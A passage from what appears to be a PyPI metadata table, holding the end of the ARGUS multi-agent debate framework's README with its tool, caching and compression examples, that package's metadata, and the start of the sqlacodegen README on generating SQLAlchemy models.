print(f"Dimension: {len(vectors[0])}") # 384
# Query embedding for search
query_vec = embedder.embed_query("What is AI?")
# OpenAI embeddings
embedder = get_embedding("openai", model="text-embedding-3-small")
vectors = embedder.embed_documents(["Doc 1", "Doc 2"])
# Cohere embeddings
embedder = get_embedding("cohere", model="embed-english-v3.0")
query_vec = embedder.embed_query("search query") # Uses search_query input type
```
---
## Tool Integrations (50+)
ARGUS v3.1 includes **50+ pre-built tools** across 13 categories for comprehensive agent capabilities.
### Available Tools by Category
| Category | Tools | Description |
|----------|-------|-------------|
| **Search** | DuckDuckGo, Wikipedia, ArXiv, Tavily, Brave, Exa | Web and academic search |
| **Web** | Requests, WebScraper, JinaReader, YouTube | Web content access |
| **Productivity** | FileSystem, PythonREPL, Shell, GitHub, JSON | Core productivity |
| **Database** | SQL, Pandas | Data access and manipulation |
| **Finance** | YahooFinance, Weather | Financial and weather data |
| **AI Agents** | AgentMail, AgentOps, GoodMem, Freeplay | AI agent infrastructure |
| **Cloud** | BigQuery, PubSub, CloudTrace, VertexAI Search/RAG | Google Cloud services |
| **Vector DB** | Chroma, Pinecone, Qdrant, MongoDB | Vector databases |
| **Productivity (Extended)** | Asana, Jira, Confluence, Linear, Notion | Project management |
| **Communication** | Mailgun, Stripe, PayPal | Email and payments |
| **DevOps** | GitLab, Postman, Daytona, N8n | Development operations |
| **Media/AI** | ElevenLabs, Cartesia, HuggingFace | Media and AI platforms |
| **Observability** | Arize, Phoenix, Monocle, MLflow, W&B Weave | ML observability |
### Installation
```bash
# Core tools (search, web, productivity, database, finance)
pip install argus-debate-ai[tools]
# Extended tools (all 50+ integrations)
pip install argus-debate-ai[tools-extended]
# Or install all features
pip install argus-debate-ai[all]
```
### Quick Examples
```python
from argus.tools.integrations import (
# Search
DuckDuckGoTool, WikipediaTool, ArxivTool,
# Productivity
PythonReplTool, AsanaTool, NotionTool,
# Cloud
BigQueryTool, VertexAISearchTool,
# Vector DB
PineconeTool, QdrantTool,
# Observability
MLflowTool, WandBWeaveTool,
)
# Free web search
search = DuckDuckGoTool()
result = search(query="latest AI research 2024", max_results=5)
for r in result.data["results"]:
print(f"- {r['title']}: {r['url']}")
# Wikipedia lookup
wiki = WikipediaTool()
result = wiki(query="Machine Learning", action="summary", sentences=3)
print(result.data["summary"])
# ArXiv paper search
arxiv = ArxivTool()
result = arxiv(query="transformer attention", max_results=5)
for paper in result.data["results"]:
print(f"📄 {paper['title']}")
# Execute Python code
repl = PythonReplTool()
result = repl(code="print(sum([1,2,3,4,5]))")
print(result.data["output"]) # 15
# Asana task management
asana = AsanaTool()
result = asana(action="list_tasks", project_gid="your-project-id")
# Notion database query
notion = NotionTool()
result = notion(action="query_database", database_id="your-db-id")
# BigQuery data analysis
bq = BigQueryTool()
result = bq(action="query", query="SELECT * FROM dataset.table LIMIT 10")
# Pinecone vector search
pinecone = PineconeTool()
result = pinecone(action="query", vector=[0.1]*1536, top_k=5)
# MLflow experiment tracking
mlflow = MLflowTool()
result = mlflow(action="log_metric", run_id="run-123", key="accuracy", value=0.95)
# W&B Weave tracing
weave = WandBWeaveTool()
result = weave(action="log_call", call_data={"model": "gpt-4", "input": "Hello"})
```
### AI Agent Tools
Tools for AI agent infrastructure and orchestration:
```python
from argus.tools.integrations import AgentMailTool, AgentOpsTool, GoodMemTool, FreeplayTool
# AgentMail - Autonomous email handling
agentmail = AgentMailTool()
result = agentmail(action="create_inbox", name="support-agent")
# AgentOps - Agent observability
agentops = AgentOpsTool()
result = agentops(action="create_session", tags=["prod", "customer-support"])
# GoodMem - Long-term memory for agents
goodmem = GoodMemTool()
result = goodmem(action="create_memory", content="User prefers detailed explanations")
# Freeplay - LLM testing and evaluation
freeplay = FreeplayTool()
result = freeplay(action="run_test", prompt_id="prompt-123")
```
### Cloud Tools
Google Cloud Platform integrations:
```python
from argus.tools.integrations import (
BigQueryTool, PubSubTool, CloudTraceTool,
VertexAISearchTool, VertexAIRAGTool,
)
# BigQuery - Data warehouse
bq = BigQueryTool()
result = bq(action="query", query="SELECT * FROM analytics.events LIMIT 100")
# Pub/Sub - Messaging
pubsub = PubSubTool()
result = pubsub(action="publish", topic="events", message={"event": "user_signup"})
# Cloud Trace - Distributed tracing
trace = CloudTraceTool()
result = trace(action="create_span", name="process_request")
# Vertex AI Search - Enterprise search
search = VertexAISearchTool()
result = search(action="search", query="product documentation", data_store_id="my-store")
# Vertex AI RAG - Retrieval augmented generation
rag = VertexAIRAGTool()
result = rag(action="query", query="How do I configure X?", corpus_id="my-corpus")
```
### Vector Database Tools
Full CRUD operations for vector databases:
```python
from argus.tools.integrations import ChromaTool, PineconeTool, QdrantTool, MongoDBTool
# Chroma - Local vector DB
chroma = ChromaTool()
result = chroma(action="add", collection="docs", documents=["Hello world"], ids=["doc1"])
# Pinecone - Cloud vector DB
pinecone = PineconeTool()
result = pinecone(action="upsert", vectors=[{"id": "v1", "values": [0.1]*1536}])
# Qdrant - High-performance vector search
qdrant = QdrantTool()
result = qdrant(action="search", collection="embeddings", vector=[0.1]*384, limit=5)
# MongoDB - Document + vector search
mongodb = MongoDBTool()
result = mongodb(action="vector_search", collection="articles", vector=[0.1]*1536)
```
### Productivity Tools (Extended)
Project management and documentation tools:
```python
from argus.tools.integrations import AsanaTool, JiraTool, ConfluenceTool, LinearTool, NotionTool
# Asana - Project management
asana = AsanaTool()
result = asana(action="create_task", project_gid="123", name="Review PR", assignee="me")
# Jira - Issue tracking
jira = JiraTool()
result = jira(action="create_issue", project_key="PROJ", summary="Bug fix", issue_type="Bug")
# Confluence - Documentation
confluence = ConfluenceTool()
result = confluence(action="create_page", space_key="DOCS", title="API Guide", body="<p>...</p>")
# Linear - Engineering issues
linear = LinearTool()
result = linear(action="create_issue", team_id="team-123", title="Feature request")
# Notion - Knowledge management
notion = NotionTool()
result = notion(action="create_page", parent_id="page-123", title="Meeting Notes")
```
### Communication & Payment Tools
Email and payment processing:
```python
from argus.tools.integrations import MailgunTool, StripeTool, PayPalTool
# Mailgun - Email sending
mailgun = MailgunTool()
result = mailgun(action="send", to="user@example.com", subject="Welcome!", text="...")
# Stripe - Payments
stripe = StripeTool()
result = stripe(action="create_payment_intent", amount=2000, currency="usd")
# PayPal - Payments
paypal = PayPalTool()
result = paypal(action="create_order", amount="19.99", currency="USD")
```
### DevOps Tools
Development operations and automation:
```python
from argus.tools.integrations import GitLabTool, PostmanTool, DaytonaTool, N8nTool
# GitLab - Git operations
gitlab = GitLabTool()
result = gitlab(action="create_merge_request", project_id=123, source="feature", target="main")
# Postman - API testing
postman = PostmanTool()
result = postman(action="run_collection", collection_id="col-123")
# Daytona - Dev environments
daytona = DaytonaTool()
result = daytona(action="create_workspace", repository="https://github.com/org/repo")
# N8n - Workflow automation
n8n = N8nTool()
result = n8n(action="execute_workflow", workflow_id="wf-123")
```
### Media & AI Tools
Media generation and AI platforms:
```python
from argus.tools.integrations import ElevenLabsTool, CartesiaTool, HuggingFaceTool
# ElevenLabs - Text-to-speech
elevenlabs = ElevenLabsTool()
result = elevenlabs(action="text_to_speech", text="Hello world", voice_id="voice-123")
# Cartesia - Audio AI
cartesia = CartesiaTool()
result = cartesia(action="synthesize", text="Welcome to ARGUS", voice_id="voice-456")
# HuggingFace - ML models
huggingface = HuggingFaceTool()
result = huggingface(action="inference", model_id="gpt2", inputs="The future of AI is")
```
### Observability Tools
ML observability and monitoring:
```python
from argus.tools.integrations import ArizeTool, PhoenixTool, MonocleTool, MLflowTool, WandBWeaveTool
# Arize - ML observability
arize = ArizeTool()
result = arize(action="log_prediction", model_id="classifier-v1", prediction=0.85)
# Phoenix - LLM tracing
phoenix = PhoenixTool()
result = phoenix(action="log_span", name="llm_call", input="Query", output="Response")
# Monocle - GenAI tracing
monocle = MonocleTool()
result = monocle(action="start_trace", name="agent_workflow")
# MLflow - Experiment tracking
mlflow = MLflowTool()
result = mlflow(action="create_run", experiment_id="exp-123")
# W&B Weave - LLM evaluation
weave = WandBWeaveTool()
result = weave(action="create_dataset", name="eval-dataset", rows=[...])
```
### Tool Registry
```python
from argus.tools.integrations import (
list_all_tools,
list_tool_categories,
get_tools_by_category,
get_tool_count,
)
# List all 50+ tools
print(list_all_tools())
# List categories (13 categories)
print(list_tool_categories())
# ['search', 'web', 'productivity', 'database', 'finance', 'ai_agents',
# 'cloud', 'vectordb', 'productivity_extended', 'communication',
# 'devops', 'media_ai', 'observability']
# Get tools by category
observability_tools = get_tools_by_category("observability")
# [ArizeTool, PhoenixTool, MonocleTool, MLflowTool, WandBWeaveTool]
# Total count
print(f"Total tools: {get_tool_count()}") # 50+
```
---
## OpenAPI REST Integration
ARGUS v3.1 includes a powerful OpenAPI module for automatically generating tools from REST API specifications.
### Features
- **OpenAPI v2 (Swagger) and v3 support**
- **Automatic client generation** from specs
- **Tool code generation** for agent integrations
- **Full authentication support** (API Key, Bearer, Basic, OAuth2)
- **Type-safe parameter handling**
### Installation
```bash
pip install argus-debate-ai[openapi]
```
### Quick Start
```python
from argus.core.openapi import (
load_openapi_spec,
OpenAPIParser,
OpenAPIClient,
OpenAPIToolGenerator,
)
# Load OpenAPI spec (JSON, YAML, or URL)
spec = load_openapi_spec("https://api.example.com/openapi.json")
# Parse the specification
parser = OpenAPIParser()
api_spec = parser.parse(spec)
print(f"API: {api_spec.title} v{api_spec.version}")
print(f"Endpoints: {len(api_spec.operations)}")
```
### Dynamic Client Generation
```python
from argus.core.openapi import create_client
# Create a dynamic REST client from any OpenAPI spec
client = create_client(
spec_path="https://petstore.swagger.io/v2/swagger.json",
api_key="your-api-key", # Or bearer_token, basic_auth
)
# Methods are generated automatically from the spec
pets = client.get_pets(limit=10)
pet = client.get_pet_by_id(pet_id=123)
new_pet = client.create_pet(name="Fluffy", status="available")
```
### Tool Code Generation
Generate complete tool implementations for agent use:
```python
from argus.core.openapi import generate_tool_code
# Generate a full BaseTool implementation
code = generate_tool_code(
spec_path="./api_spec.yaml",
class_name="PetStoreTool",
)
# Save to file
with open("petstore_tool.py", "w") as f:
f.write(code)
# The generated tool can be immediately used:
# from petstore_tool import PetStoreTool
# tool = PetStoreTool()
# result = tool(action="get_pets", limit=10)
```
### CLI Usage
```bash
# List available endpoints
argus openapi ./api_spec.yaml --list-endpoints
# Validate a spec
argus openapi https://api.example.com/openapi.json --validate
# Generate tool code
argus openapi ./api_spec.yaml --output my_tool.py --class-name MyAPITool
```
### Authentication
```python
from argus.core.openapi import create_client
# API Key authentication
client = create_client(spec_path="./spec.yaml", api_key="sk-xxx")
# Bearer token authentication
client = create_client(spec_path="./spec.yaml", bearer_token="eyJ...")
# Basic authentication
client = create_client(spec_path="./spec.yaml", basic_auth=("user", "pass"))
```
---
## Context Caching
ARGUS v3.1 includes a comprehensive caching system for optimizing context management, reducing API costs, and improving performance.
### Features
- **Multiple backends**: Memory (LRU), File (persistent), Redis (distributed)
- **Specialized caches**: Conversation, Embedding, LLM Response
- **TTL support**: Automatic expiration
- **Namespaces**: Isolated cache spaces
- **Statistics**: Hit rates, access patterns
### Installation
```bash
pip install argus-debate-ai[context]
```
### Quick Start
```python
from argus.core.context_caching import (
ContextCache,
MemoryBackend,
FileBackend,
ConversationCache,
EmbeddingCache,
LLMResponseCache,
)
# Simple in-memory cache
cache = ContextCache(backend=MemoryBackend())
cache.set("key", {"data": "value"}, ttl=3600)
result = cache.get("key")
# Persistent file cache
cache = ContextCache(
backend=FileBackend(cache_dir=".argus_cache"),
namespace="my_app",
)
```
### Conversation Cache
Efficiently manage multi-turn conversation history:
```python
from argus.core.context_caching import ConversationCache
# Create conversation cache
conv_cache = ConversationCache(max_messages=100, max_tokens=8000)
# Add messages
conv_cache.add_message("user", "Hello, how are you?")
conv_cache.add_message("assistant", "I'm doing well, thank you!")
# Get conversation for LLM
messages = conv_cache.get_messages()
# Get recent context with token limit
context = conv_cache.get_recent_context(max_tokens=4000)
# Summarize old messages to save space
conv_cache.summarize_and_truncate(llm=your_llm, keep_recent=10)
```
### Embedding Cache
Cache embeddings to reduce API calls:
```python
from argus.core.context_caching import EmbeddingCache
# Create embedding cache
embed_cache = EmbeddingCache(
backend=FileBackend(cache_dir=".embeddings_cache"),
model_name="text-embedding-3-small",
)
# Check cache before calling API
text = "Hello world"
cached = embed_cache.get(text)
if cached is None:
# Generate embedding
embedding = your_embedder.embed(text)
embed_cache.set(text, embedding)
else:
embedding = cached
# Batch operations
texts = ["doc1", "doc2", "doc3"]
cached, missing = embed_cache.get_batch(texts)
# Only generate embeddings for missing texts
```
### LLM Response Cache
Cache LLM responses for identical inputs:
```python
from argus.core.context_caching import LLMResponseCache
# Create response cache (deterministic key from prompt + params)
response_cache = LLMResponseCache(
backend=MemoryBackend(max_size=1000),
default_ttl=86400, # 24 hours
)
# Cache lookup
prompt = "Explain machine learning"
params = {"model": "gpt-4", "temperature": 0}
cached = response_cache.get(prompt, **params)
if cached is None:
response = llm.generate(prompt, **params)
response_cache.set(prompt, response, **params)
else:
response = cached
```
### Decorator Pattern
```python
from argus.core.context_caching import ContextCache
cache = ContextCache(backend=MemoryBackend())
@cache.cached(ttl=3600)
def expensive_computation(input_data: str) -> dict:
# This will be cached
return {"result": process(input_data)}
```
### CLI Usage
```bash
# Show cache statistics
argus cache stats --backend file --path .argus_cache
# Clear cache
argus cache clear --backend memory
# Export cache (for debugging/migration)
argus cache export --path ./cache_backup
```
---
## Context Compression
ARGUS v3.1 includes advanced compression techniques to reduce token usage while preserving meaning.
### Features
- **Multiple compression methods**: Whitespace, Punctuation, Stopword, Sentence, Code, Semantic
- **Compression levels**: Minimal, Moderate, Aggressive, Extreme
- **Token counting**: Accurate token estimation with tiktoken
- **Message compression**: Optimize conversation history
- **Auto-detection**: Automatically select best method for content type
### Installation
```bash
pip install argus-debate-ai[context]
```
### Quick Start
```python
from argus.core.context_compression import (
compress_text,
compress_to_tokens,
CompressionLevel,
)
# Simple compression
result = compress_text(
"This is a very long text with lots of whitespace...",
level=CompressionLevel.MODERATE,
)
print(result.compressed_text)
print(f"Savings: {result.savings_percentage:.1f}%")
# Compress to target token count
result = compress_to_tokens(long_text, target_tokens=1000)
print(f"Tokens saved: {result.tokens_saved}")
```
### Compression Methods
```python
from argus.core.context_compression import (
WhitespaceCompressor,
StopwordCompressor,
SentenceCompressor,
CodeCompressor,
SemanticCompressor,
)
# Whitespace compression (fastest, safest)
compressor = WhitespaceCompressor()
result = compressor.compress("Hello world") # "Hello world"
# Stopword removal (moderate compression)
compressor = StopwordCompressor()
result = compressor.compress("This is a very important document")
# "very important document"
# Sentence compression (keeps important sentences)
compressor = SentenceCompressor(ratio=0.5, min_sentences=3)
result = compressor.compress(long_document)
# Code compression (minifies code while preserving syntax)
compressor = CodeCompressor()
result = compressor.compress(python_code)
# Semantic compression (LLM-based, best quality)
compressor = SemanticCompressor(llm=your_llm)
result = compressor.compress(document, target_ratio=0.3)
```
### Message Compression
Compress conversation history for LLM context:
```python
from argus.core.context_compression import MessageCompressor
compressor = MessageCompressor(
max_tokens=4000,
preserve_system=True, # Keep system messages intact
preserve_recent=5, # Keep last 5 messages intact
)
messages = [
{"role": "system", "content": "You are a helpful assistant."},
{"role": "user", "content": "Long user message..."},
{"role": "assistant", "content": "Long assistant response..."},
# ... many more messages
]
compressed = compressor.compress(messages)
print(f"Messages: {len(messages)} -> {len(compressed)}")
```
### Context Compressor (Auto)
Automatically detect content type and apply best compression:
```python
from argus.core.context_compression import ContextCompressor
compressor = ContextCompressor()
# Auto-detects content type and applies appropriate method
result = compressor.auto_compress(
content=mixed_content,
target_tokens=2000,
)
# Analyze content before compression
analysis = compressor.analyze(content)
print(f"Type: {analysis['content_type']}")
print(f"Current tokens: {analysis['token_count']}")
print(f"Recommended method: {analysis['recommended_method']}")
```
### CLI Usage
```bash
# Compress a file
argus compress input.txt --output compressed.txt --level moderate
# Compress to token target
argus compress input.txt --target-tokens 1000
# Specific compression method
argus compress code.py --method code --output minified.py
```
---
## Debate Visualization
ARGUS v3.1 includes a comprehensive visualization module for debate analysis and presentation.
### Features
- **Argument flow graphs**: NetworkX-based directed graphs
- **Timeline visualization**: Temporal argument progression
- **Agent performance charts**: Multi-metric agent analysis
- **Confidence evolution**: Rolling average tracking
- **Round summaries**: Per-round statistics
- **Interaction heatmaps**: Agent collaboration patterns
- **Interactive dashboards**: Combined multi-panel views
- **Export formats**: HTML, PNG, JSON reports
### Installation
```bash
pip install argus-debate-ai[plotting]
```
### Quick Start
```python
from argus.debate.visualization import (
DebateSession,
create_debate_dashboard,
export_debate_html,
plot_argument_flow,
)
# Load debate data
with open("debate_results.json") as f:
data = json.load(f)
session = DebateSession.from_dict(data)
# Create comprehensive dashboard
fig = create_deb | text/markdown | null | "Ankush Pandey, Rishi Ghodawat, Ronit Mehta" <mehtaronit702@gmail.com> | null | ARGUS Team <mehtaronit702@gmail.com> | MIT | ai, artificial-intelligence, multi-agent, debate, reasoning, llm, gpt, claude, gemini, scientific-discovery, research, decision-making, fact-checking, verification, rag, retrieval-augmented-generation, embeddings, vector-search, knowledge-graph, bayesian-inference, argumentation, provenance, langchain-alternative, agent-framework, llm-framework, openai, anthropic, ollama, openapi, rest-api, context-caching, context-compression, tool-integrations, observability, mlops | [
"Development Status :: 6 - Mature",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Intended Audience :: Information Technology",
"Intended Audience :: Education",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Operating System :: POSIX :: Linux",
"Operating System :: Microsoft :: Windows",
"Operating System :: MacOS",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: Implementation :: CPython",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Scientific/Engineering :: Information Analysis",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Text Processing :: Linguistic",
"Topic :: Internet :: WWW/HTTP :: Indexing/Search",
"Framework :: AsyncIO",
"Typing :: Typed",
"Environment :: Console",
"Environment :: Web Environment",
"Natural Language :: English"
] | [] | null | null | >=3.11 | [] | [] | [] | [
"pydantic<3.0,>=2.0",
"pydantic-settings<3.0,>=2.0",
"numpy<3.0,>=1.24",
"scipy<2.0,>=1.10",
"networkx<4.0,>=3.0",
"litellm<2.0,>=1.40",
"openai<2.0,>=1.30",
"anthropic<1.0,>=0.25",
"google-generativeai<1.0,>=0.5",
"sentence-transformers<3.0,>=2.2",
"rank-bm25<1.0,>=0.2",
"faiss-cpu<2.0,>=1.7",
"pymupdf<2.0,>=1.23",
"beautifulsoup4<5.0,>=4.12",
"lxml<6.0,>=4.9",
"chardet<6.0,>=5.0",
"click<9.0,>=8.0",
"rich<14.0,>=13.0",
"python-dotenv<2.0,>=1.0",
"httpx<1.0,>=0.25",
"tenacity<9.0,>=8.2",
"tiktoken<1.0,>=0.5",
"requests<3.0,>=2.31",
"textual<1.0,>=0.47",
"pytest<9.0,>=7.4; extra == \"dev\"",
"pytest-asyncio<1.0,>=0.21; extra == \"dev\"",
"pytest-cov<6.0,>=4.1; extra == \"dev\"",
"black<25.0,>=23.0; extra == \"dev\"",
"ruff<1.0,>=0.1; extra == \"dev\"",
"mypy<2.0,>=1.5; extra == \"dev\"",
"pre-commit<4.0,>=3.4; extra == \"dev\"",
"ollama<1.0,>=0.2; extra == \"ollama\"",
"llama-cpp-python<1.0,>=0.2; extra == \"llamacpp\"",
"cohere<6.0,>=5.0; extra == \"cohere\"",
"mistralai<1.0,>=0.4; extra == \"mistral\"",
"groq<1.0,>=0.4; extra == \"groq\"",
"together<2.0,>=1.0; extra == \"together\"",
"voyageai<1.0,>=0.2; extra == \"voyage\"",
"boto3<2.0,>=1.34; extra == \"bedrock\"",
"google-cloud-aiplatform<2.0,>=1.40; extra == \"vertex\"",
"fastembed<1.0,>=0.2; extra == \"embeddings\"",
"cohere<6.0,>=5.0; extra == \"embeddings\"",
"voyageai<1.0,>=0.2; extra == \"embeddings\"",
"nomic<4.0,>=3.0; extra == \"embeddings\"",
"duckduckgo-search<6.0,>=5.0; extra == \"tools\"",
"wikipedia<2.0,>=1.4; extra == \"tools\"",
"arxiv<3.0,>=2.1; extra == \"tools\"",
"tavily-python<1.0,>=0.3; extra == \"tools\"",
"PyGithub<3.0,>=2.1; extra == \"tools\"",
"youtube-transcript-api<1.0,>=0.6; extra == \"tools\"",
"sqlalchemy<3.0,>=2.0; extra == \"tools\"",
"pandas<3.0,>=2.0; extra == \"tools\"",
"yfinance<1.0,>=0.2; extra == \"tools\"",
"agentops<1.0,>=0.3; extra == \"tools-extended\"",
"google-cloud-bigquery<4.0,>=3.0; extra == \"tools-extended\"",
"google-cloud-pubsub<3.0,>=2.0; extra == \"tools-extended\"",
"google-cloud-trace<2.0,>=1.0; extra == \"tools-extended\"",
"google-cloud-aiplatform<2.0,>=1.40; extra == \"tools-extended\"",
"chromadb<1.0,>=0.4; extra == \"tools-extended\"",
"pinecone-client<4.0,>=3.0; extra == \"tools-extended\"",
"qdrant-client<2.0,>=1.7; extra == \"tools-extended\"",
"pymongo<5.0,>=4.6; extra == \"tools-extended\"",
"asana<6.0,>=5.0; extra == \"tools-extended\"",
"jira<4.0,>=3.0; extra == \"tools-extended\"",
"atlassian-python-api<4.0,>=3.0; extra == \"tools-extended\"",
"notion-client<3.0,>=2.0; extra == \"tools-extended\"",
"python-gitlab<5.0,>=4.0; extra == \"tools-extended\"",
"elevenlabs<2.0,>=1.0; extra == \"tools-extended\"",
"huggingface-hub<1.0,>=0.20; extra == \"tools-extended\"",
"mlflow<3.0,>=2.10; extra == \"tools-extended\"",
"wandb<1.0,>=0.16; extra == \"tools-extended\"",
"arize<8.0,>=7.0; extra == \"tools-extended\"",
"opentelemetry-api<2.0,>=1.20; extra == \"tools-extended\"",
"opentelemetry-sdk<2.0,>=1.20; extra == \"tools-extended\"",
"tiktoken<1.0,>=0.5; extra == \"context\"",
"redis<6.0,>=5.0; extra == \"context\"",
"diskcache<6.0,>=5.6; extra == \"context\"",
"pyyaml<7.0,>=6.0; extra == \"openapi\"",
"jsonschema<5.0,>=4.20; extra == \"openapi\"",
"matplotlib<4.0,>=3.7; extra == \"plotting\"",
"seaborn<1.0,>=0.12; extra == \"plotting\"",
"plotly<6.0,>=5.15; extra == \"plotting\"",
"textual<1.0,>=0.47; extra == \"terminal\"",
"pyinstaller<7.0,>=6.0; extra == \"terminal\"",
"streamlit<2.0,>=1.30; extra == \"viz\"",
"plotly<6.0,>=5.15; extra == \"viz\"",
"networkx<4.0,>=3.0; extra == \"viz\"",
"argus-debate-ai[dev]; extra == \"all\"",
"argus-debate-ai[ollama]; extra == \"all\"",
"argus-debate-ai[cohere]; extra == \"all\"",
"argus-debate-ai[mistral]; extra == \"all\"",
"argus-debate-ai[groq]; extra == \"all\"",
"argus-debate-ai[tools]; extra == \"all\"",
"argus-debate-ai[tools-extended]; extra == \"all\"",
"argus-debate-ai[embeddings]; extra == \"all\"",
"argus-debate-ai[plotting]; extra == \"all\"",
"argus-debate-ai[viz]; extra == \"all\"",
"argus-debate-ai[context]; extra == \"all\"",
"argus-debate-ai[openapi]; extra == \"all\""
] | [] | [] | [] | [
"Homepage, https://github.com/Ronit26Mehta/argus-ai-debate",
"Documentation, https://github.com/Ronit26Mehta/argus-ai-debate#readme",
"Repository, https://github.com/Ronit26Mehta/argus-ai-debate",
"Issues, https://github.com/Ronit26Mehta/argus-ai-debate/issues",
"Changelog, https://github.com/Ronit26Mehta/argus-ai-debate/releases"
] | twine/6.2.0 CPython/3.11.3 | 2026-02-20T09:02:34.613824 | argus_debate_ai-3.1.0.tar.gz | 569,946 | 99/ba/6d585018bb3950436c8ee6efef91f06e136be9f9f63ebb2e355c8c3776b6/argus_debate_ai-3.1.0.tar.gz | source | sdist | null | false | f311269111888f0be7b32d2b4151e5cb | 56e830ccc7d2be9ef18237ee09e1c54e4586f9762813b1ec3ed0cfbcb9d51120 | 99ba6d585018bb3950436c8ee6efef91f06e136be9f9f63ebb2e355c8c3776b6 | null | [
"LICENSE"
] | 208 |
2.4 | sqlacodegen | 4.0.1 | Automatic model code generator for SQLAlchemy | .. image:: https://github.com/agronholm/sqlacodegen/actions/workflows/test.yml/badge.svg
:target: https://github.com/agronholm/sqlacodegen/actions/workflows/test.yml
:alt: Build Status
.. image:: https://coveralls.io/repos/github/agronholm/sqlacodegen/badge.svg?branch=master
:target: https://coveralls.io/github/agronholm/sqlacodegen?branch=master
:alt: Code Coverage
.. image:: https://tidelift.com/badges/package/pypi/sqlacodegen
:target: https://tidelift.com/subscription/pkg/pypi-sqlacodegen
:alt: Tidelift
This is a tool that reads the structure of an existing database and generates the
appropriate SQLAlchemy model code, using the declarative style if possible.
This tool was written as a replacement for `sqlautocode`_, which was suffering from
several issues (including, but not limited to, incompatibility with Python 3 and the
latest SQLAlchemy version).
.. _sqlautocode: http://code.google.com/p/sqlautocode/
Features
========
* Supports SQLAlchemy 2.x
* Produces declarative code that almost looks like it was hand written
* Produces `PEP 8`_ compliant code
* Accurately determines relationships, including many-to-many, one-to-one
* Automatically detects joined table inheritance
* Excellent test coverage
.. _PEP 8: http://www.python.org/dev/peps/pep-0008/
Installation
============
To install, do::
pip install sqlacodegen
To include support for the PostgreSQL ``CITEXT`` extension type (which should be
considered as tested only under a few environments) specify the ``citext`` extra::
pip install sqlacodegen[citext]
To include support for the PostgreSQL ``GEOMETRY``, ``GEOGRAPHY``, and ``RASTER`` types
(which should be considered as tested only under a few environments) specify the
``geoalchemy2`` extra:
To include support for the PostgreSQL ``PGVECTOR`` extension type, specify the
``pgvector`` extra::
pip install sqlacodegen[pgvector]
.. code-block:: bash
pip install sqlacodegen[geoalchemy2]
Quickstart
==========
At the minimum, you have to give sqlacodegen a database URL. The URL is passed directly
to SQLAlchemy's `create_engine()`_ method so please refer to
`SQLAlchemy's documentation`_ for instructions on how to construct a proper URL.
Examples::
sqlacodegen postgresql:///some_local_db
sqlacodegen --generator tables mysql+pymysql://user:password@localhost/dbname
sqlacodegen --generator dataclasses sqlite:///database.db
# --engine-arg values are parsed with ast.literal_eval
sqlacodegen oracle+oracledb://user:pass@127.0.0.1:1521/XE --engine-arg thick_mode=True
sqlacodegen oracle+oracledb://user:pass@127.0.0.1:1521/XE --engine-arg thick_mode=True --engine-arg connect_args='{"user": "user", "dsn": "..."}'
To see the list of generic options::
sqlacodegen --help
.. _create_engine(): http://docs.sqlalchemy.org/en/latest/core/engines.html#sqlalchemy.create_engine
.. _SQLAlchemy's documentation: http://docs.sqlalchemy.org/en/latest/core/engines.html
Available generators
====================
The selection of a generator determines the
The following built-in generators are available:
* ``tables`` (only generates ``Table`` objects, for those who don't want to use the ORM)
* ``declarative`` (the default; generates classes inheriting from ``declarative_base()``
* ``dataclasses`` (generates dataclass-based models; v1.4+ only)
* ``sqlmodels`` (generates model classes for SQLModel_)
.. _SQLModel: https://sqlmodel.tiangolo.com/
Generator-specific options
==========================
The following options can be turned on by passing them using ``--options`` (multiple
values must be delimited by commas, e.g. ``--options noconstraints,nobidi``):
* ``tables``
* ``noconstraints``: ignore constraints (foreign key, unique etc.)
* ``nocomments``: ignore table/column comments
* ``noindexes``: ignore indexes
* ``nonativeenums``: don't generate Python enum classes for native database ENUM types (e.g., PostgreSQL ENUM); use plain string mapping instead
* ``nosyntheticenums``: don't generate Python enum classes from CHECK constraints with IN clauses (e.g., ``column IN ('value1', 'value2', ...)``); preserves CHECK constraints as-is
* ``noidsuffix``: prevent the special naming logic for single column many-to-one
and one-to-one relationships (see `Relationship naming logic`_ for details)
* ``include_dialect_options``: render a table' dialect options, such as ``starrocks_partition`` for StarRocks' specific options.
* ``keep_dialect_types``: preserve dialect-specific column types instead of adapting to generic SQLAlchemy types.
* ``declarative``
* all the options from ``tables``
* ``use_inflect``: use the ``inflect`` library when naming classes and relationships
(turning plural names into singular; see below for details)
* ``nojoined``: don't try to detect joined-class inheritance (see below for details)
* ``nobidi``: generate relationships in a unidirectional fashion, so only the
many-to-one or first side of many-to-many relationships gets a relationship
attribute, as on v2.X
* ``nofknames``: disable improved relationship naming when multiple FKs or
junction tables connect to the same target. By default, uses FK column names
for one-to-many (e.g., ``simple_items_parent_container``) and junction table
names for many-to-many (e.g., ``students_enrollments``). Reverts to
underscore suffixes (``simple_items_``, ``student_``).
* ``dataclasses``
* all the options from ``declarative``
* ``sqlmodels``
* all the options from ``declarative``
Model class generators
----------------------
The code generators that generate classes try to generate model classes whenever
possible. There are two circumstances in which a ``Table`` is generated instead:
* the table has no primary key constraint (which is required by SQLAlchemy for every
model class)
* the table is an association table between two other tables (see below for the
specifics)
Model class naming logic
++++++++++++++++++++++++
By default, table names are converted to valid PEP 8 compliant class names by replacing
all characters unsuitable for Python identifiers with ``_``. Then, each valid parts
(separated by underscores) are title cased and then joined together, eliminating the
underscores. So, ``example_name`` becomes ``ExampleName``.
If the ``use_inflect`` option is used, the table name (which is assumed to be in
English) is converted to singular form using the "inflect" library. For example,
``sales_invoices`` becomes ``SalesInvoice``. Since table names are not always in
English, and the inflection process is far from perfect, inflection is disabled by
default.
Relationship detection logic
++++++++++++++++++++++++++++
Relationships are detected based on existing foreign key constraints as follows:
* **many-to-one**: a foreign key constraint exists on the table
* **one-to-one**: same as **many-to-one**, but a unique constraint exists on the
column(s) involved
* **many-to-many**: (not implemented on the ``sqlmodel`` generator) an association table
is found to exist between two tables
A table is considered an association table if it satisfies all of the following
conditions:
#. has exactly two foreign key constraints
#. all its columns are involved in said constraints
Relationship naming logic
+++++++++++++++++++++++++
Relationships are typically named based on the table name of the opposite class.
For example, if a class has a relationship to another class with the table named
``companies``, the relationship would be named ``companies`` (unless the ``use_inflect``
